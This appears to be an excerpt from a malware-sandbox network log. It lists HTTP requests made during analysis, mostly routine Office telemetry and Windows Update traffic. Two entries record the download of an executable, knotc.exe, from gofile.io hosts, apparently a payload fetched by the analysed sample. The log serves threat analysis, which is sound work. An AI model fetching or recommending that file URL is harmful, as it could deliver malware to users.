                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ybAhMg3ktFn4l3f&MD=haNnP8Ll HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exe HTTP/1.1Host: store1.gofile.io
                      Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exe HTTP/1.1Host: file4.gofile.ioConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
